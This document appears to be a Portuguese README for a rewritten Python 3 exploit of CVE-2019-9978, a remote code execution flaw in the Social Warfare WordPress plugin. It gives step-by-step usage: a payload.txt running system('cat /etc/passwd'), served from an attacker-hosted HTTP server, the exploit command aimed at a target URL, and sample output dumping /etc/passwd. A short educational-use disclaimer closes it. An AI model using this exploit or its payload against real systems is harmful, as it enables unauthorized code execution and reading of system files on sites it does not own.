
Uma vulnerabilidade de Execução Remota de Código (RCE) no plugin Social Warfare para WordPress, afetando versões anteriores à 3.5.3.
Uma vulnerabilidade de Execução Remota de Código (RCE) no plugin Social Warfare para WordPress, afetando todas as versões abaixo de 3.5.3.
O exploit público original foi escrito em uma versão desatualizada do Python e não funciona mais corretamente em ambientes modernos.
Reescrevi o exploit para ser totalmente compatível com Python 3, tornando-o mais fácil de usar, entender e integrar a ferramentas modernas.
Crie um arquivo chamado payload.txt com o seguinte conteúdo:
<pre>system('cat /etc/passwd')</pre>
Use Python para servir seu payload:
python3 -m http.server 8000
Isso tornará seu payload.txt acessível em:
http://<your-ip>:8000/payload.txt
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
--payload-uri http://<your-ip>:8000/payload.txt
Se o alvo estiver vulnerável, você receberá uma saída semelhante a:
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...



🧬 Se este payload alegrou o seu dia, uma ⭐ alegraria o meu.
< 3.5.3⚠️ Aviso Legal: Este repositório é apenas para fins educacionais e de testes éticos.
O uso não autorizado deste exploit contra sistemas que você não possui é estritamente proibido.